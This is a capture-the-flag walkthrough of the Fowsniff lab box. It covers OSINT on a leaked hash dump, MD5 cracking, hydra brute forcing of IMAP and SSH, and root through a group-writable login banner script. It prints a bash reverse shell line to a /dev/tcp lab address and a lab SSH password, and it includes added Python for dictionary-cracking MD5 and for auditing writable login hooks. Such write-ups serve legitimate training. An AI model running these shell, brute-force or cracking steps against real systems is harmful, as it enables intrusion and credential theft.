Fowsniff Offensive-Security Walkthrough

Musyoka Ian
8 min read, Nov 26, 2020

Hello guys, hope you are doing great. Today I am going to be doing a walkthrough of Fowsniff, a box that I found on the Offensive Security platform. I haven’t done OSCP yet but I am planning on taking the exam early next year, and therefore I decided to try the free boxes on Offensive Security just to get a feel for what to expect. Fowsniff is an easy box that shows the importance of learning OSINT, because the initial foothold on the box wasn’t a matter of how well you can enumerate the box but of spotting what stands out. We get a Twitter username from the webpage, try it on Twitter and find a tweet saying that some credentials were posted to Pastebin. The creds were MD5 hashed. We crack those hashes using hashcat and get access to the POP3 server. After we log in to POP3 we get another credential from an email, and after an SSH brute force with hydra we get a valid SSH credential. User done!!! For root we enumerate the box with linpeas and find a group-writable file that gets executed whenever we log in to the box via SSH; we add a reverse shell to that group-writable file and get root on the box. The box took me about an hour to solve, and I am trying to solve as many boxes as possible to reduce the time I take on each box, because during the OSCP exam the more boxes you solve the more points you get. Without further ado, let’s jump in.

As always we start off with an nmap scan of the box

Looking at the results obtained we have four ports open. Three of those ports, namely SSH, POP3 and IMAP, require credentials for access, so we can’t enumerate much there; therefore I started with HTTP, which as always has a bigger attack surface, and we always like attacking HTTP servers.

Opening the webpage we get a standard web page

I decided to run gobuster on the web page before starting to do manual enumeration

Next I decided to run nikto just in case it came back with anything useful, and left it running in the background.

After leaving all the automated tools running in the background I decided to enumerate the webpage manually.

Looking at the source code by pressing Ctrl + U I found nothing useful. I decided to check whether robots.txt existed, and got lucky: it did.

But still, looking at robots.txt I found nothing useful. I decided to go back and see if gobuster had found any interesting files or directories.

Looking at the gobuster output I saw that one interesting file had been identified: security.txt.

I decided to check the file using the web browser, and we see it talks about a hacker called B1gN1nj4! who has already exploited the server.

But nothing else useful. Next I decided to run cewl against the page, because some of those words looked like credentials to me.

Next I tried a brute force attack with hydra, and it came back empty.

It was a dead end. I continued enumerating the box, but it still came back empty. I went back to the homepage and decided to read all the information provided, and one thing stood out.

We are told that the attacker may have released sensitive information on Twitter. I decided to do some OSINT, went to Twitter and hunted for the account.

And after searching for the username, one account showed up.

Looking at the tweets we see that the user dumped all the users’ passwords to Pastebin, and we are given a URL. I decided to follow the URL and, voila, we have our first breakthrough.

Looking at the screenshot above we have a list of hashed credentials. I copied them to my local box and sorted them into usernames and passwords.

Next I decided to crack the hashes with hashcat and the rockyou wordlist to get the passwords.

Looking at the screenshot above, we were able to crack all the hashes except one. Sweet.
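As an added example (not from the original post), here is the kind of triage you can script around such a leak: a parser for "user:md5" lines and a wordlist lookup that recovers unsalted MD5 hashes, which is exactly why a leaked MD5 list is effectively a leaked password list. The dump lines, addresses and wordlist are constructed for the example and are not values from the box; hashcat and rockyou are not used here.

```python
import hashlib

def md5_hex(text):
    """Unsalted MD5 hex digest, the format the leaked list in the post was in."""
    return hashlib.md5(text.encode()).hexdigest()

# Constructed stand-in for the pastebin dump: "email:md5hex" lines, plus noise a
# parser must tolerate. Hashes are derived here from known plaintexts so the sample is
# self-consistent; none of these are values from the actual box.
SAMPLE_DUMP = "\n".join([
    "# users dumped from mail db",
    f"alice@example.test:{md5_hex('password')}",
    f"bob@example.test:{md5_hex('letmein')}",
    "this line has no separator and is skipped",
    f"carol@example.test:{md5_hex('Tr0ub4dor&3')}",  # not in the wordlist: stays uncracked
])
WORDLIST = ["123456", "password", "qwerty", "letmein"]  # stand-in for rockyou.txt

def parse_dump(text):
    """Return (username, hash) pairs; drop comments, blanks and malformed lines."""
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, digest = line.partition(":")
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            creds.append((user.strip(), digest))
    return creds

def crack_md5(creds, wordlist):
    """Dictionary attack: hash each candidate once, then look up every target.
    Returns {username: plaintext or None}; None means 'not in the wordlist'."""
    targets = {digest for _, digest in creds}
    found = {}
    for word in wordlist:
        digest = md5_hex(word)
        if digest in targets:
            found[digest] = word
    return {user: found.get(digest) for user, digest in creds}

if __name__ == "__main__":
    for user, pw in crack_md5(parse_dump(SAMPLE_DUMP), WORDLIST).items():
        print(user, pw or "<not cracked>")
```

The single hash per candidate word is all it costs to test the whole list, which is why salted, slow hashes (bcrypt, scrypt, Argon2) are the mitigation for stored passwords.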

Since we had some possible credentials, I tried an SSH brute force attack again.

But looking at the result, we never got a valid credential. Going back to our enumeration phase, we had both IMAP and POP3, which are mail protocols and require credentials. Hydra also supports brute forcing these protocols, so I decided to try brute forcing the IMAP protocol with hydra.

And this time I got lucky: one employee’s password had not been changed since the breach happened.

Sweet, now we have a valid mail account. I decided to log into POP3 and see if I could find any mails in Seina’s account.

Looking at the screenshot above we have two messages. I decided to take a look at both of them

The first message had an SSH password.

I added the password to my passwords list and then looked at the second mail

The second mail had nothing useful apart from a new username. I added the username to the username.txt list.

Since we had a new set of credentials, I decided to try an SSH brute force for the third time using hydra, and this time it came back successful with a valid credential:

baksteen:S1ck3nBluff+secureshell

I decided to log in to SSH using those credentials and, voila, we had a shell on the box.

That was a lot of work. Looking around, we have local.txt (the user flag).

I submitted the flag and it was accepted by Offensive Security. I decided to show the flag since Offensive Security uses dynamic flag generation, meaning that when you do the box the flag will probably be different; the HackTheBox platform uses the same concept.

But enough of that. Next I decided to perform privilege escalation on the box. I uploaded linpeas to the box and ran it.

I allowed linpeas to run, and when it was finished I checked the result. One item stood out: we have group write access to a file called cube.sh in the opt directory.

The next interesting thing was that there were some password hashes in a database.

These hashes seemed to be md5crypt hashes.

But I decided to take a look at the cube.sh file first.

Looking at the screenshot above we can see that it is just the banner shown every time we log in to the box. Since I had write access to the file and it is a bash script, I could simply add a bash command to the file, and when the script is executed at login it would print the result of that command.

I added whoami, saved the file and logged in to the box over SSH again. As the screenshot below shows, we have code execution and the command ran as root.

Next I added a bash reverse shell to the file using the following syntax:

bash -i >& /dev/tcp/192.168.49.185/9001 0>&1

I saved the script and set up a netcat listener.

I then tried logging in to the box over SSH again and, as you can see below, we had a root shell on the box.
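The root cause here is a script that root runs at every SSH login but that a non-root group can edit. As an added example (not part of the original post), this Python audit follows login hooks to the scripts they hand off to and reports any that are group- or world-writable, so the weak setting can be caught before it is abused. It assumes Debian/Ubuntu hook locations and builds a constructed temporary file tree for the demonstration; the hook and script paths in it are not the real box’s paths.

```python
import glob
import os
import re
import stat
import tempfile

# Login-time hooks on a Debian/Ubuntu-style host (constructed list; extend for your distro).
HOOK_DIRS = ["etc/profile.d", "etc/update-motd.d"]
HOOK_FILES = ["etc/profile", "etc/bash.bashrc"]
# Matches "sh /path", "bash /path", ". /path" or "source /path" inside a hook script.
SCRIPT_REF = re.compile(r"(?:^|[\s;&|(])(?:\.|source|sh|bash)\s+(/\S+)", re.M)

def perm_issues(path):
    """Mode bits that let a non-root user change what runs at every login."""
    mode = os.lstat(path).st_mode
    return [name for bit, name in ((stat.S_IWGRP, "group-writable"),
                                   (stat.S_IWOTH, "world-writable")) if mode & bit]

def audit_login_hooks(root="/"):
    """Return {path: issues} for each hook and each script a hook hands off to."""
    todo = [os.path.join(root, f) for f in HOOK_FILES]
    for d in HOOK_DIRS:
        todo += sorted(glob.glob(os.path.join(root, d, "*")))
    findings, seen = {}, set()
    while todo:
        path = todo.pop(0)
        if path in seen or not os.path.isfile(path):
            continue
        seen.add(path)
        with open(path, errors="replace") as fh:  # follow "sh /opt/x.sh" style hand-offs
            todo += [os.path.join(root, r.lstrip("/")) for r in SCRIPT_REF.findall(fh.read())]
        if perm_issues(path):
            findings[path] = perm_issues(path)
    return findings

def build_demo_tree():
    """Constructed filesystem: a motd hook that runs a group-writable script under /opt."""
    root = tempfile.mkdtemp()
    hook = os.path.join(root, "etc/update-motd.d/00-header")
    script = os.path.join(root, "opt/demo/banner.sh")
    for path, body, mode in ((hook, "#!/bin/sh\nsh /opt/demo/banner.sh\n", 0o755),
                             (script, "#!/bin/bash\necho 'welcome banner'\n", 0o664)):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)  # 0o664 is the weak setting: group members can edit root's script
    return root
```

Run `audit_login_hooks()` with the default root on a live host to check the real hooks; the fix for any hit is `chmod 755` and root ownership on the script and its directory.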

Next I looked around for the root flag; it was in the root folder, and I submitted it to Offensive Security as well.

And the box is pretty much done, guys: we have root on the box. It was rated as an easy box, and I think I spent too much time on the initial foothold. About an hour to complete the box was a lot of time for such a box. I am not sure whether it’s an OSCP-like box, but it was fun nonetheless. Hope you guys enjoyed the walkthrough; if so you can clap for me down below, and don’t forget to follow me so that you don’t miss any upcoming articles.

Looking back at the walkthrough, I decided not only to show the correct path for solving the box but also the rabbit hole that I fell into, and the reason I did so was to show you when you need to stop enumerating something and look for a different vector. The privilege escalation is similar to when you have write access to the motd.

Till next time it’s goodbye from me.

For more reading material you can take a look at the links below:

  1. POP3
  2. IMAP
